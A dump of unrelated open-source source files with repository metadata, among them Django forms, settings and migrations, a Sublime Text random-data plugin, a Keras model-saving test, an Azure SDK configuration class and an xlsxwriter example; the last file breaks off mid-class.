self.fields['accept_of_sending_data_to_WOSP'].required = True
self.fields['accept_of_sending_data_to_WOSP'].initial = False
def clean_password_confirm(self):
password = self.cleaned_data.get('password')
password_confirm = self.cleaned_data.get('password_confirm')
if password != password_confirm:
raise forms.ValidationError(_("Passwords doesn't match."))
return password_confirm
def save(self, commit=True):
profile = super(RegisterUserFullForm, self).save(commit=False)
profile.set_password(self.cleaned_data["password"])
if commit:
profile.save()
return profile
class Meta:
model = Profile
fields = ['pesel','email', 'photo', 'first_name', 'last_name', 'street', 'house', 'flat', 'zip', 'city', 'phone',
'workplace_name', 'workplace_address', 'workplace_zip', 'workplace_city', 'password','password_confirm',
"consent_processing_of_personal_data", "accept_of_sending_data_to_WOSP"]
class AdminRegisterUserFullForm(RegisterUserFullForm):
#small hack to show those fields
consent_processing_of_personal_data = forms.BooleanField(required=False, initial=True)
accept_of_sending_data_to_WOSP = forms.BooleanField(required=False, initial=True)
def __init__(self, *args, **kwargs):
super(AdminRegisterUserFullForm, self).__init__(*args, **kwargs)
self.fields['consent_processing_of_personal_data'].required = False
self.fields['accept_of_sending_data_to_WOSP'].required = False
def clean(self):
cleaned_data = self.cleaned_data
cleaned_data['consent_processing_of_personal_data'] = True
cleaned_data['accept_of_sending_data_to_WOSP'] = True
return cleaned_data
| {
"content_hash": "25d92df0a3a33ca95519af4932f0a50d",
"timestamp": "",
"source": "github",
"line_count": 87,
"max_line_length": 121,
"avg_line_length": 45.01149425287356,
"alnum_prop": 0.7040347293156282,
"repo_name": "jacoor/sew_django",
"id": "79fafa8e74f6e8d3217a5dd862e1ffa72356482d",
"size": "3941",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "sew_django/profiles/forms.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "511"
},
{
"name": "HTML",
"bytes": "11190"
},
{
"name": "Nginx",
"bytes": "2138"
},
{
"name": "Python",
"bytes": "50203"
}
],
"symlink_target": ""
} |
"""
DB abstraction for <Project_name>
"""
from <project_name>.db.api import * # noqa
| {
"content_hash": "21edef09b1f1fd424e11bc97707d3e45",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 43,
"avg_line_length": 17.4,
"alnum_prop": 0.6551724137931034,
"repo_name": "hahaps/openstack-project-generator",
"id": "887cc3d597b4754854d339646df0eb223e8a81a9",
"size": "818",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "template/<project_name>/db/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "689778"
},
{
"name": "Shell",
"bytes": "23190"
}
],
"symlink_target": ""
} |
import sublime
import sublime_plugin
import random as r
import datetime
import string
import os
import uuid
import logging
PACKAGES_PATH = os.path.dirname(os.path.realpath(__file__))
def get_settings():
return sublime.load_settings('Random.sublime-settings')
"""
Base class for the Random generator. Extends the WindowCommand and adds helper methods
"""
class RandomWindow(sublime_plugin.WindowCommand):
def default_range(self):
"""
This should be persisted somehow
"""
return '1,100'
def get_range(self, input_text):
try:
input_text = input_text.replace(' ', '')
start, stop = input_text.split(',')
start = int(start)
stop = int(stop)
if start > stop:
raise ValueError('Invalid format. Maybe you meant: {},{}?'.format(stop, start))
self.insert({'start': start, 'stop': stop})
except Exception as e:
logging.exception(e)
sublime.error_message('Must be two comma separated integers')
def insert(self, kwargs):
view = self.window.active_view()
view.run_command(self.text_command, kwargs)
"""
Base class for the Random generator. Extends the window and adds helper methods
"""
class RandomText(sublime_plugin.TextCommand):
def insert(self, view, generator):
sels = self.view.sel()
for region in sels:
output = generator()
self.view.insert(view, region.begin(), output)
def get_data_file(self, filename):
words = []
word_file = os.path.join(PACKAGES_PATH + '/assets', filename)
with open(word_file) as f:
words = f.read().splitlines()
return words
def get_words(self):
return self.get_data_file('words.txt')
def get_first_names(self):
return self.get_data_file('first_names.txt')
def get_last_names(self):
return self.get_data_file('last_names.txt')
def get_countries(self):
return self.get_data_file('countries.txt')
"""
Window commands
"""
class RandomIntWindowCommand(RandomWindow):
def run(self):
self.text_command = 'random_int'
self.window.show_input_panel('Random integer from-to',self.default_range(), self.get_range, None, None)
class RandomFloatWindowCommand(RandomWindow):
def run(self):
self.text_command = 'random_float'
self.window.show_input_panel('Random float from-to',self.default_range(), self.get_range, None, None)
"""
END Window commands
"""
"""
Text commands
"""
class RandomIntCommand(RandomText):
def generate_int(self):
output = r.randint(self.start, self.stop)
return str(output)
def run(self, view, **kwargs):
self.start = kwargs['start']
self.stop = kwargs['stop']
self.insert(view, self.generate_int)
class RandomFloatCommand(RandomText):
def generate_float(self):
output = r.uniform(self.start, self.stop)
output = '{0:g}'.format(output)
return str(output)
def run(self, view, **kwargs):
self.start = kwargs['start']
self.stop = kwargs['stop']
self.insert(view, self.generate_float)
class RandomLetterCommand(RandomText):
def generate_letters(self):
upper_range = r.randint(3, 20)
output = ''
for letter in range(0, upper_range):
output += r.choice(string.ascii_letters)
return output
def run(self, view, **kwargs):
self.insert(view, self.generate_letters)
class RandomLetterAndNumberCommand(RandomText):
def generate_letters_and_numbers(self):
upper_range = r.randint(3, 20)
output = ''
for letter in range(0, upper_range):
output += r.choice(string.ascii_letters + string.digits)
return output
def run(self, view, **kwargs):
self.insert(view, self.generate_letters_and_numbers)
class RandomWordCommand(RandomText):
def generate_word(self):
words = self.get_words()
return r.choice(words)
def run(self, view, **kwargs):
self.insert(view, self.generate_word)
class RandomTextCommand(RandomText):
def generate_text(self):
words = self.get_words()
return ' '.join([r.choice(words) for i in range(0,24)])
def run(self, view, **kwargs):
self.insert(view, self.generate_text)
class RandomUuidCommand(RandomText):
def generate_uuid(self):
return str(uuid.uuid4())
def run(self, view, **kwargs):
self.insert(view, self.generate_uuid)
class RandomFirstNameCommand(RandomText):
def generate_first_name(self):
first_names = self.get_first_names()
return r.choice(first_names)
def run(self, view, **kwargs):
self.insert(view, self.generate_first_name)
class RandomLastNameCommand(RandomText):
def generate_last_name(self):
last_names = self.get_last_names()
return r.choice(last_names)
def run(self, view, **kwargs):
self.insert(view, self.generate_last_name)
class RandomFullNameCommand(RandomText):
def generate_full_name(self):
first_names = self.get_first_names()
last_names = self.get_last_names()
return '%s %s' % (r.choice(first_names), r.choice(last_names))
def run(self, view, **kwargs):
self.insert(view, self.generate_full_name)
class RandomUrlCommand(RandomText):
def generate_url(self):
r_words = [r.choice(self.get_words()) for i in range(0,7)]
scheme = r.choice(['http', 'https'])
domain = r_words[0]
path = '/'.join(r_words[1:3])
query = 'a=%s&b=%s' % (r_words[4], r_words[5])
fragment = r_words[6]
url = '%s://%s.com/%s?%s#%s' % (scheme, domain, path, query, fragment)
return url.lower()
def run(self, view, **kwargs):
self.insert(view, self.generate_url)
class RandomEmailCommand(RandomText):
def generate_email(self):
settings = get_settings()
u_name = self.get_words()
u_name = r.choice(u_name)
domain = settings.get('random_email_main_domain_override',self.get_words())
domain = r.choice(domain)
seq = settings.get('random_email_top_level_domain_override',['com', 'net', 'edu'])
top_domain = r.choice(seq)
email = '%s@%s.%s' %(u_name, domain, top_domain)
return email.lower()
def run(self, view, **kwargs):
self.insert(view, self.generate_email)
class RandomHexColorCommand(RandomText):
def generate_hex_color(self):
return '#%06x' % r.randint(0,0xFFFFFF)
def run(self, view, **kwargs):
self.insert(view, self.generate_hex_color)
class RandomDateCommand(RandomText):
def generate_random_date(self):
year = r.randint(datetime.datetime.now().year - 10, datetime.datetime.now().year + 10)
month = r.randint(1, 12)
day = r.randint(1, 28)
date = datetime.date(year, month, day)
return date.isoformat()
def run(self, view, **kwargs):
self.insert(view, self.generate_random_date)
class RandomTimeCommand(RandomText):
def generate_random_time(self):
hour = r.randint(0, 23)
minute = r.randint(0, 59)
second = r.randint(0, 59)
time = datetime.time(hour, minute, second)
return time.isoformat()
def run(self, view, **kwargs):
self.insert(view, self.generate_random_time)
class RandomDatetimeRfc3339Command(RandomText):
def generate_random_datetime_rfc3339(self):
year = r.randint(datetime.datetime.now().year - 10, datetime.datetime.now().year + 10)
month = r.randint(1, 12)
day = r.randint(1, 28)
date = datetime.date(year, month, day)
hour = r.randint(0, 23)
minute = r.randint(0, 59)
second = r.randint(0, 59)
time = datetime.time(hour, minute, second)
timezone = r.randint(0, 24) - 12
if timezone == 0:
return "%sT%sZ" % (date.isoformat(), time.isoformat())
return "%sT%s%+03d:00" % (date.isoformat(), time.isoformat(), timezone)
def run(self, view, **kwargs):
self.insert(view, self.generate_random_datetime_rfc3339)
class RandomIpv4AddressCommand(RandomText):
def generate_ipv4_address(self):
return "%s.%s.%s.%s" % (r.randint(0,255), r.randint(0,255), r.randint(0,255), r.randint(0,255))
def run(self, view, **kwargs):
self.insert(view, self.generate_ipv4_address)
class RandomIpv6AddressCommand(RandomText):
def generate_hexbyte(self):
choice = "0123456789ABCDEF"
return "%s%s" % (r.choice(choice), r.choice(choice))
def generate_ipv6_address(self):
address = ""
for x in range(0,8):
address += self.generate_hexbyte()
address += self.generate_hexbyte()
if x < 7:
address += ":"
return address
def run(self, view, **kwargs):
self.insert(view, self.generate_ipv6_address)
class RandomCountryCommand(RandomText):
def generate_country(self):
countries = self.get_countries()
return r.choice(countries)
def run(self, view, **kwargs):
self.insert(view, self.generate_country)
"""
END Text commands
"""
| {
"content_hash": "8c255717ea8d34af70a326738467e199",
"timestamp": "",
"source": "github",
"line_count": 316,
"max_line_length": 111,
"avg_line_length": 29.446202531645568,
"alnum_prop": 0.6184846856528748,
"repo_name": "kimpettersen/random-sublime-text-plugin",
"id": "d36ca877f618fa8513112fb382d51307b0d1d445",
"size": "9305",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "random.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "9305"
}
],
"symlink_target": ""
} |
"""Tests for saving/loading function for keras Model."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import shutil
from absl.testing import parameterized
import numpy as np
from tensorflow.python import keras
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.keras.tests import model_architectures
from tensorflow.python.platform import test
@keras_parameterized.run_with_all_saved_model_formats
class TestModelArchitectures(keras_parameterized.TestCase):
def _save_model_dir(self, dirname='saved_model'):
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
return os.path.join(temp_dir, dirname)
def get_test_data(self, input_shape, target_shape):
"""Generate test dataset for testing."""
if isinstance(input_shape, list):
x = [
np.random.random((2,) + input_shape[i][1:])
for i in range(len(input_shape))
]
else:
x = np.random.random((2,) + input_shape[1:])
if isinstance(target_shape, list):
y = [
np.random.random((2,) + target_shape[i][1:])
for i in range(len(target_shape))
]
else:
y = np.random.random((2,) + target_shape[1:])
return x, y
def get_custom_objects(self):
"""Define custom_objects."""
class CustomOpt(keras.optimizers.SGD):
pass
def custom_loss(y_true, y_pred):
return keras.losses.mse(y_true, y_pred)
return {'CustomOpt': CustomOpt,
'custom_loss': custom_loss}
@parameterized.named_parameters(*model_architectures.ALL_MODELS)
def test_basic_saving_and_loading(self, model_fn):
save_format = testing_utils.get_save_format()
custom_objects = self.get_custom_objects()
if 'subclassed_in_functional' in model_fn.__name__:
subclass_custom_objects = {
'MySubclassModel':
model_architectures.MySubclassModel,
}
custom_objects.update(subclass_custom_objects)
elif ('subclassed' in model_fn.__name__ and save_format == 'h5'):
self.skipTest('Saving the model to HDF5 format requires the model to be '
'a Functional model or a Sequential model.')
saved_model_dir = self._save_model_dir()
model_data = model_fn()
model = model_data.model
x_test, y_test = self.get_test_data(
model_data.input_shape, model_data.target_shape)
model.compile('rmsprop', 'mse')
model.train_on_batch(x_test, y_test)
# Save model.
out1 = model.predict(x_test)
keras.models.save_model(model, saved_model_dir, save_format=save_format)
# Load model.
loaded_model = keras.models.load_model(
saved_model_dir,
custom_objects=custom_objects)
out2 = loaded_model.predict(x_test)
self.assertAllClose(out1, out2, atol=1e-05)
if __name__ == '__main__':
test.main()
| {
"content_hash": "ff70267153b3dad9d7a22eb8d9367439",
"timestamp": "",
"source": "github",
"line_count": 94,
"max_line_length": 79,
"avg_line_length": 31.659574468085108,
"alnum_prop": 0.6656586021505376,
"repo_name": "renyi533/tensorflow",
"id": "fe7b7e476b015eaaab8e89bfea1fe79b4dcf52e8",
"size": "3700",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "tensorflow/python/keras/tests/model_architectures_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "31572"
},
{
"name": "Batchfile",
"bytes": "55269"
},
{
"name": "C",
"bytes": "903309"
},
{
"name": "C#",
"bytes": "8562"
},
{
"name": "C++",
"bytes": "82507951"
},
{
"name": "CMake",
"bytes": "6967"
},
{
"name": "Dockerfile",
"bytes": "113964"
},
{
"name": "Go",
"bytes": "1871425"
},
{
"name": "HTML",
"bytes": "4686483"
},
{
"name": "Java",
"bytes": "988219"
},
{
"name": "Jupyter Notebook",
"bytes": "550861"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "MLIR",
"bytes": "2073744"
},
{
"name": "Makefile",
"bytes": "66796"
},
{
"name": "Objective-C",
"bytes": "116558"
},
{
"name": "Objective-C++",
"bytes": "319021"
},
{
"name": "PHP",
"bytes": "4236"
},
{
"name": "Pascal",
"bytes": "318"
},
{
"name": "Pawn",
"bytes": "20422"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "Python",
"bytes": "37811412"
},
{
"name": "RobotFramework",
"bytes": "1779"
},
{
"name": "Roff",
"bytes": "2705"
},
{
"name": "Ruby",
"bytes": "7464"
},
{
"name": "SWIG",
"bytes": "6846"
},
{
"name": "Shell",
"bytes": "696058"
},
{
"name": "Smarty",
"bytes": "35725"
},
{
"name": "Starlark",
"bytes": "3655758"
},
{
"name": "Swift",
"bytes": "62814"
},
{
"name": "Vim Snippet",
"bytes": "58"
}
],
"symlink_target": ""
} |
from time import gmtime, strftime
from kritzbot.commandmanager import CommandManager
from kritzbot.logger import Logger
log = Logger(__name__)
class ChatStream:
def __init__(self, message, user):
self.msg = message
self.user = user
self.timestamp = strftime("%Y-%m-%d %H:%M:%S", gmtime())
self.msg_length = len(message)
def parse(self):
log.message(self.msg, self.msg_length, self.user)
try:
if(self.isCommand()):
command = self.getCommand()
command_handler = CommandManager(command, self.msg, self.user)
command_handler.getCommand()
else:
self.nonCommand()
except Exception as e:
log.info(e)
def isCommand(self):
command_start = str(self.msg)[:1]
if(command_start == '!'):
return True
return False
def getCommand(self):
cmd = self.msg.replace('!', '')
return cmd
def nonCommand(self):
log.info('non command detected')
# do non command stuff here | {
"content_hash": "310ef653a1dcddde3b02e0a17aca14ba",
"timestamp": "",
"source": "github",
"line_count": 39,
"max_line_length": 66,
"avg_line_length": 23.46153846153846,
"alnum_prop": 0.6808743169398908,
"repo_name": "LouisBluhm/PyBot",
"id": "4d7e8cbc087c62ae1db9ed6e0236d4638ee4c743",
"size": "915",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "new_bot/kritzbot/chatstream.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "266"
},
{
"name": "HTML",
"bytes": "9466"
},
{
"name": "Python",
"bytes": "52349"
}
],
"symlink_target": ""
} |
from atom.api import Str, Int, Float, Bool, Enum
from Instrument import Instrument
class DCSource(Instrument):
output = Bool(False).tag(desc='Output enabled')
mode = Enum('voltage', 'current').tag(desc='Output mode (current or voltage source)')
value = Float(0.0).tag(desc='Output value (current or voltage)')
class YokoGS200(DCSource):
outputRange = Enum(1e-3, 10e-3, 100e-3, 200e-3, 1, 10, 30).tag(desc='Output range')
def json_encode(self, matlabCompatible=False):
jsonDict = super(YokoGS200, self).json_encode(matlabCompatible)
if matlabCompatible:
jsonDict['range'] = jsonDict.pop('outputRange')
return jsonDict | {
"content_hash": "6e8434d6e70ea70f1f970fb7b83e8596",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 86,
"avg_line_length": 37.294117647058826,
"alnum_prop": 0.7334384858044164,
"repo_name": "rmcgurrin/PyQLab",
"id": "e5fd750d6da2af97cdc4da3356f30b98c0919f97",
"size": "634",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "instruments/DCSources.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "104179"
}
],
"symlink_target": ""
} |
"""
Django settings for fitnessTracker project.
Generated by 'django-admin startproject' using Django 1.9.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '51p-k857m0p#0x_7_8(xf(mrixd8zun)zvinh#)!)%j9g)c*e5'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'userFit',
'activity',
'psycopg2',
'corsheaders',
'rest_framework',
# 'rest_framework.authtoken',
]
AUTH_USER_MODEL = 'userFit.UserProfile'
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
)
ROOT_URLCONF = 'fitnessTracker.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.IsAuthenticated',
],
'PAGE_SIZE': 100
}
WSGI_APPLICATION = 'fitnessTracker.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.postgresql_psycopg2',
# 'NAME': 'fitness',
# 'USER': 'postgres',
# 'PASSWORD': '',
# 'HOST': '104.167.100.64',
# 'PORT': '8456',
# }
# }
DATABASE_USER = os.environ.get("FITNESS_DB_USER", '')
DATABASE_PASSWORD = os.environ.get("FITNESS_DB_PASSWORD", '')
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'fitnessTracker',
'USER': DATABASE_USER,
'PASSWORD' : DATABASE_PASSWORD,
'HOST': 'workout.cib1bj0g7xy8.us-east-1.rds.amazonaws.com',
'PORT': '4876',
}
}
CORS_ORIGIN_ALLOW_ALL = True
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
#
# AUTH_PASSWORD_VALIDATORS = [
# {
# 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
# },
# {
# 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
# },
# {
# 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
# },
# {
# 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
# },
# ]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = "/var/www/"
| {
"content_hash": "3cc23582e9303fd95eaa5530a7a35c69",
"timestamp": "",
"source": "github",
"line_count": 156,
"max_line_length": 93,
"avg_line_length": 27.076923076923077,
"alnum_prop": 0.6647727272727273,
"repo_name": "Girardvjonathan/anotherFitnessApp",
"id": "b9f16fc8d3eaef9c9485e8a86b028ec333eee3c1",
"size": "4224",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "fitnessTracker/settings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "21388"
},
{
"name": "Shell",
"bytes": "478"
}
],
"symlink_target": ""
} |
import sys
from typing import Any, TYPE_CHECKING
from azure.core.configuration import Configuration
from azure.core.pipeline import policies
from azure.mgmt.core.policies import ARMChallengeAuthenticationPolicy, ARMHttpLoggingPolicy
from ._version import VERSION
if sys.version_info >= (3, 8):
from typing import Literal # pylint: disable=no-name-in-module, ungrouped-imports
else:
from typing_extensions import Literal # type: ignore # pylint: disable=ungrouped-imports
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from azure.core.credentials import TokenCredential
class OperationsManagementClientConfiguration(Configuration): # pylint: disable=too-many-instance-attributes
"""Configuration for OperationsManagementClient.
Note that all parameters used to create this instance are saved as instance
attributes.
:param credential: Credential needed for the client to connect to Azure. Required.
:type credential: ~azure.core.credentials.TokenCredential
:param subscription_id: Gets subscription credentials which uniquely identify Microsoft Azure
subscription. The subscription ID forms part of the URI for every service call. Required.
:type subscription_id: str
:keyword api_version: Api Version. Default value is "2015-11-01-preview". Note that overriding
this default value may result in unsupported behavior.
:paramtype api_version: str
"""
def __init__(self, credential: "TokenCredential", subscription_id: str, **kwargs: Any) -> None:
super(OperationsManagementClientConfiguration, self).__init__(**kwargs)
api_version = kwargs.pop("api_version", "2015-11-01-preview") # type: Literal["2015-11-01-preview"]
if credential is None:
raise ValueError("Parameter 'credential' must not be None.")
if subscription_id is None:
raise ValueError("Parameter 'subscription_id' must not be None.")
self.credential = credential
self.subscription_id = subscription_id
self.api_version = api_version
self.credential_scopes = kwargs.pop("credential_scopes", ["https://management.azure.com/.default"])
kwargs.setdefault("sdk_moniker", "mgmt-operationsmanagement/{}".format(VERSION))
self._configure(**kwargs)
def _configure(
self, **kwargs # type: Any
):
# type: (...) -> None
self.user_agent_policy = kwargs.get("user_agent_policy") or policies.UserAgentPolicy(**kwargs)
self.headers_policy = kwargs.get("headers_policy") or policies.HeadersPolicy(**kwargs)
self.proxy_policy = kwargs.get("proxy_policy") or policies.ProxyPolicy(**kwargs)
self.logging_policy = kwargs.get("logging_policy") or policies.NetworkTraceLoggingPolicy(**kwargs)
self.http_logging_policy = kwargs.get("http_logging_policy") or ARMHttpLoggingPolicy(**kwargs)
self.retry_policy = kwargs.get("retry_policy") or policies.RetryPolicy(**kwargs)
self.custom_hook_policy = kwargs.get("custom_hook_policy") or policies.CustomHookPolicy(**kwargs)
self.redirect_policy = kwargs.get("redirect_policy") or policies.RedirectPolicy(**kwargs)
self.authentication_policy = kwargs.get("authentication_policy")
if self.credential and not self.authentication_policy:
self.authentication_policy = ARMChallengeAuthenticationPolicy(
self.credential, *self.credential_scopes, **kwargs
)
| {
"content_hash": "f8cf8c2d3b0cfd96b5ba826a50f1df7f",
"timestamp": "",
"source": "github",
"line_count": 68,
"max_line_length": 109,
"avg_line_length": 51.294117647058826,
"alnum_prop": 0.716743119266055,
"repo_name": "Azure/azure-sdk-for-python",
"id": "75df0524e20b03a4491670da34a0414463496bfd",
"size": "3956",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "sdk/operationsmanagement/azure-mgmt-operationsmanagement/azure/mgmt/operationsmanagement/_configuration.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
} |
import xlsxwriter
# Create a workbook and add a worksheet.
output_file = 'output/test_formula.xlsx'
workbook = xlsxwriter.Workbook(output_file)
worksheet = workbook.add_worksheet()
# Add a bold format to use to highlight cells.
bold = workbook.add_format({'bold': True})
# Add a number format for cells with money.
money = workbook.add_format({'num_format': '$#,##0'})
# Write some data headers.
worksheet.write('A1', 'Item', bold)
worksheet.write('B1', 'Cost', bold)
# Some data we want to write to the worksheet.
expenses = (
['Rent', 1000],
['Gas', 100],
['Food', 300],
['Gym', 50],
)
# Start from the first cell below the headers.
row = 1
col = 0
# Iterate over the data and write it out row by row.
for item, cost in (expenses):
worksheet.write(row, col, item)
worksheet.write(row, col + 1, cost, money)
row += 1
# Write a total using a formula.
worksheet.write(row, 0, 'Total', bold)
worksheet.write(row, 1, '=SUM(B2:B5)', money)
workbook.close()
| {
"content_hash": "5949b9a96ead176c928efb5baf92bd23",
"timestamp": "",
"source": "github",
"line_count": 40,
"max_line_length": 53,
"avg_line_length": 24.75,
"alnum_prop": 0.6717171717171717,
"repo_name": "prajesh-ananthan/Tools",
"id": "12a3030efb2bda20a4075253f15336e2c008e8dc",
"size": "990",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "income_worksheet_creator/test/test_formula_on_worksheet.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "25991"
}
],
"symlink_target": ""
} |
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
("data", "0035_auto_20210422_1926"),
("people_admin", "0006_alter_persondelta_data_changes"),
]
operations = [
migrations.CreateModel(
name="PersonRetirement",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("date", models.CharField(max_length=10)),
("is_dead", models.BooleanField()),
("is_vacant", models.BooleanField()),
("reason", models.TextField()),
(
"delta_set",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="person_retirements",
to="people_admin.deltaset",
),
),
(
"person",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, to="data.person"
),
),
],
),
]
| {
"content_hash": "6615b4cbdb547b405c3fe7a47e26a8f0",
"timestamp": "",
"source": "github",
"line_count": 45,
"max_line_length": 85,
"avg_line_length": 31.733333333333334,
"alnum_prop": 0.4096638655462185,
"repo_name": "openstates/openstates.org",
"id": "97c097811409da0655842e41d753d647c0eaaeaf",
"size": "1475",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "people_admin/migrations/0007_personretirement.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2271"
},
{
"name": "Dockerfile",
"bytes": "2731"
},
{
"name": "HTML",
"bytes": "170085"
},
{
"name": "JavaScript",
"bytes": "58627"
},
{
"name": "Jinja",
"bytes": "4114"
},
{
"name": "Procfile",
"bytes": "173"
},
{
"name": "Python",
"bytes": "338617"
},
{
"name": "SCSS",
"bytes": "52406"
},
{
"name": "Shell",
"bytes": "2288"
}
],
"symlink_target": ""
} |
class IView(object):
def __init__(self):
super(IView, self).__init__()
self.viewmodel = None
def update(self):
"""
Main function of the view component in MVVM pattern, draws the contents of the model to the output device.
"""
raise NotImplementedError()
class IViewModel(object):
"""
The ViewModel component in MVVM pattern.
"""
def __init__(self, model, view):
super(IViewModel, self).__init__()
# connect to model
self.model = model
self.model.viewmodels.append(self)
self.items = None
self.build()
# connect to view and update
self.view = view
self.view.viewmodel = self
# self.view.update()
def build(self):
"""
Converts the model to a data structure that can be rendered by the view.
"""
raise NotImplementedError()
| {
"content_hash": "b3cf3db422bab0b3cfa2d17d6dac4025",
"timestamp": "",
"source": "github",
"line_count": 36,
"max_line_length": 114,
"avg_line_length": 25.444444444444443,
"alnum_prop": 0.5731441048034934,
"repo_name": "pdyban/dicombrowser",
"id": "d4b08889af739d614370b7a476c6bc7a63928940",
"size": "918",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "dicomviewer/iview.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "5213"
},
{
"name": "Python",
"bytes": "23258"
}
],
"symlink_target": ""
} |
"""This file is part of the django ERP project.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
__author__ = 'Emanuele Bertoldi <emanuele.bertoldi@gmail.com>'
__copyright__ = 'Copyright (c) 2013-2015, django ERP Team'
__version__ = '0.0.5'
from django.conf.urls import url
from django.views.generic import TemplateView
from ..urls import urlpatterns
from ..views import SetCancelUrlMixin
class BaseTemplateView(TemplateView):
template_name = "index.html"
class SetCancelUrlTestView(SetCancelUrlMixin, BaseTemplateView):
pass
class PresetSetCancelUrlTestView(SetCancelUrlTestView):
